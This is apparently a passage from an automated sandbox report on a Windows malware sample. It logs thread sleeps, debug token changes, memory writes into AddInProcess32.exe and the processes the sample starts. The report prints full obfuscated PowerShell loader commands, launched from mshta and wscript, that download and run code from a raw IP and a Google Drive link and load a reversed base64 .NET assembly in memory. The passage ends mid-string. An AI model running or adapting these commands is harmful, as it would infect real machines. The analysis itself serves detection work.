        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 300Thread sleep time: -180000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1148Thread sleep time: -2767011611056431s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1404Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1564Thread sleep count: 1500 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1564Thread sleep count: 572 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2216Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2584Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1216Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3464Thread sleep count: 600 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3464Thread sleep count: 989 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3552Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3524Thread sleep count: 1667 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3440Thread sleep count: 8156 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2416Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -22136092888451448s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3064Thread sleep time: -3000000s >= -30000s
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe TID: 3540Thread sleep time: -240000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeThread delayed: delay time: 60000
        Source: wscript.exe, 0000000B.00000003.434706586.00000000002E0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.434741288.00000000002F4000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.434800142.00000000002F7000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.475033890.000000000015A000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.474904679.0000000000143000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.474967019.0000000000157000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mWctmPxgKqemUPO
        Source: wscript.exe, 0000000B.00000003.434722307.0000000000313000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.435360559.0000000003891000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.435417777.00000000004D1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.434773220.0000000000313000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.435145243.0000000000498000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.435707693.0000000000313000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.434800142.0000000000313000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.474904679.0000000000175000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.474989684.0000000000175000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.477949390.00000000003F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.477265850.00000000024B1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mWctmPxgKqemUPO = "LuLxoNRdcPoUimproficienteu"
        Source: wscript.exe, 0000000B.00000003.434722307.0000000000313000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.434773220.0000000000313000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000002.435707693.0000000000313000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 0000000B.00000003.434800142.0000000000313000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.474904679.0000000000175000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.474989684.0000000000175000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000003.475033890.0000000000175000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000017.00000002.478205024.0000000000175000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: mWctmPxgKqemUPO[
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4000, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3560, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 401000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 415000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 41A000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 4A0000Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 7EFDE008Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExEJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\41k31je4\41k31je4.cmdline"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS" Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES4A69.tmp" "c:\Users\user\AppData\Local\Temp\41k31je4\CSC1CC2DACCE81D4F99A1AD504B85F71256.TMP"Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRaW1hZ2VUZXh0LlN1YnN0cmluZyhVQ1FzdGFydEluZGV4LCBVQ1FiYXNlNjRMZW5ndGgpO1VDUWJhc2U2NFJldmVyc2VkID0gLWpvaW4gKFVDUWJhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSBQeXogRm9yRWFjaC1PYmplY3QgeyBVQ1FfIH0pWycrJy0xLi4tKFVDUWJhc2U2NENvbW1hbmQuTGVuZ3RoKV07VUNRY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyhVQ1FiYXNlNjRSZXZlcnNlZCk7VUNRbG9hZGVkQXNzJysnZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFVDUWNvbW1hbmRCeXRlcyk7VUMnKydRdmFpTWV0aG9kID0gW2RubGliLklPLkhvbScrJ2VdLkdldE1ldGhvZCgwVERWQUkwVEQpO1VDUXZhaU1ldGhvZC5JbnZva2UoJysnVUNRJysnbnVsbCwgQCgwVER0eHQuSUtPTDAyJVNHT0wvNjMvMTQxLjYnKyc3MS4zLjI5MS8vOnB0dGgwVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aXZhZG8wVEQsIDBURGRlc2F0aScrJ3ZhZG8wVEQsIDBUREFkZEluUHJvY2VzczMyMFRELCAwVERkZXNhdGl2YWRvMFRELCAwVERkZXNhdGl2YWRvMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwnKycwVERkZXNhdGl2YWRvJysnMFRELDBURGRlc2F0aXZhZG8wVEQsMFREZGVzYXRpdmFkbzBURCwwVCcrJ0QxMFRELDBURGRlc2F0aXZhZCcrJ28wVEQpKScrJzsnKS1yRXBsYWNFJ1VDUScsW2NIYVJdMzYgIC1yRXBsYWNFJzBURCcsW2NIYVJdMzkgIC1yRXBsYWNFIChbY0hhUl04MCtbY0hhUl0xMjErW2NIYVJdMTIyKSxbY0hhUl0xMjQpIHwuICgoR0VULXZhUklhQkxlICcqbWRyKicpLm5hTUVbMywxMSwyXS1Kb0lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('UCQimageUrl = 0TDhttps://drive.google.com/uc?export=downloa'+'d'+'&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur 0TD;UCQwebClient = New-Object System.Net.W'+'ebClient;UCQimageBytes = UCQwebClient.DownloadData(UCQim'+'ageUrl);UCQimageText = [System.Text.Encoding]::UTF8.GetString'+'(UCQimageBytes);UCQstartFlag = 0TD<<BASE64_START>>0TD;UCQ'+'endFlag = 0TD<<BASE64_END>>0TD;UCQstartIndex = UCQimageText.IndexOf(UCQstartFlag);UCQendIndex = UCQimageText.IndexOf(UCQendFlag);UCQst'+'artIndex -ge 0 -and UCQendIndex -gt UCQstartIndex;UCQstartIndex += UCQstartFlag.Length;UCQbase64'+'Length = '+'UC'+'Q'+'endIndex - UCQstartIndex;UCQbase64Command '+'= UCQimageText.Substring(UCQstartIndex, UCQbase64Length);UCQbase64Reversed = -join (UCQbase64Command.ToCharArray() Pyz ForEach-Object { UCQ_ })['+'-1..-(UCQbase64Command.Length)];UCQcommandBytes = [System.Convert]::FromBase64String(UCQbase64Reversed);UCQloadedAss'+'embly = [System.Reflection.Assembly]::Load(UCQcommandBytes);UC'+'QvaiMethod = [dnlib.IO.Hom'+'e].GetMethod(0TDVAI0TD);UCQvaiMethod.Invoke('+'UCQ'+'null, @(0TDtxt.IKOL02%SGOL/63/141.6'+'71.3.291//:ptth0TD, 0TDdesativado0TD, 0TDdesativado0TD, 0TDdesati'+'vado0TD, 0TDAddInProcess320TD, 0TDdesativado0TD, 0TDdesativado0TD,0TDdesativado0TD,0TDdesativado0TD,'+'0TDdesativado'+'0TD,0TDdesativado0TD,0TDdesativado0TD,0T'+'D10TD,0TDdesativad'+'o0TD))'+';')-rEplacE'UCQ',[cHaR]36 -rEplacE'0TD',[cHaR]39 -rEplacE ([cHaR]80+[cHaR]121+[cHaR]122),[cHaR]124) |. ((GET-vaRIaBLe '*mdr*').naME[3,11,2]-JoIN'')"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sYSTEm32\WinDOWspOwershElL\v1.0\pOweRshEll.eXe" "PoWeRshELL.exE -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE ; Iex($(IEx('[sYsTem.TeXt.eNcOdiNg]'+[ChAR]58+[chAR]0X3A+'utf8.getSTrIng([sYsTeM.cOnvErt]'+[CHar]0x3A+[cHaR]0x3A+'frOMbAsE64StrinG('+[ChAR]0x22+'JFQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC1UWVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTUVtQkVyZEVGSU5pdGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVybG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUmhQQVdhVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFpIT0djVSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFFvLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGxzaGJQSHRzLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgaik7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJuaWVlIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbWVTcEFjZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcnB3WUlpRnNleCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFQ6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xNzYuMTQxLzM2L2dvb2R0aGluZ3N3aXRoZ3JlYXRjb21lYmFja3dpdGhncmVhdHRoaWducy50SUYiLCIkRU5WOkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMiLDAsMCk7c1RhUnQtc2xlZVAoMyk7U3RhcnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFcZ29vZHRoaW5nc3dpdGhncmVhdGNvbWViYWNrd2l0aGdyZWF0dGhpZy52YlMi'+[ChAr]34+'))')))"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX bYpASs -NOp -w 1 -c DEvICecrEdentiaLdePlOYMent.ExE
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\sblybu2m\sblybu2m.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\goodthingswithgreatcomebackwithgreatthig.vbS"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES8FC2.tmp" "c:\Users\user\AppData\Local\Temp\sblybu2m\CSCFEB4FC09456049919CFF236451FA82A.TMP"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnVUNRaW1hZ2VVcmwgPSAwVERodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2EnKydkJysnJmlkPTFBSVZnSkpKdjFGNnZTNHNVT3libkgtc0R2VWhCWXd1ciAwVEQ7VUNRd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LlcnKydlYkNsaWVudDtVQ1FpbWFnZUJ5dGVzID0gVUNRd2ViQ2xpZW50LkRvd25sb2FkRGF0YShVQ1FpbScrJ2FnZVVybCk7VUNRaW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcnKycoVUNRaW1hZ2VCeXRlcyk7VUNRc3RhcnRGbGFnID0gMFREPDxCQVNFNjRfU1RBUlQ+PjBURDtVQ1EnKydlbmRGbGFnID0gMFREPDxCQVNFNjRfRU5EPj4wVEQ7VUNRc3RhcnRJbmRleCA9IFVDUWltYWdlVGV4dC5JbmRleE9mKFVDUXN0YXJ0RmxhZyk7VUNRZW5kSW5kZXggPSBVQ1FpbWFnZVRleHQuSW5kZXhPZihVQ1FlbmRGbGFnKTtVQ1FzdCcrJ2FydEluZGV4IC1nZSAwIC1hbmQgVUNRZW5kSW5kZXggLWd0IFVDUXN0YXJ0SW5kZXg7VUNRc3RhcnRJbmRleCArPSBVQ1FzdGFydEZsYWcuTGVuZ3RoO1VDUWJhc2U2NCcrJ0xlbmd0aCA9ICcrJ1VDJysnUScrJ2VuZEluZGV4IC0gVUNRc3RhcnRJbmRleDtVQ1FiYXNlNjRDb21tYW5kICcrJz0gVUNRa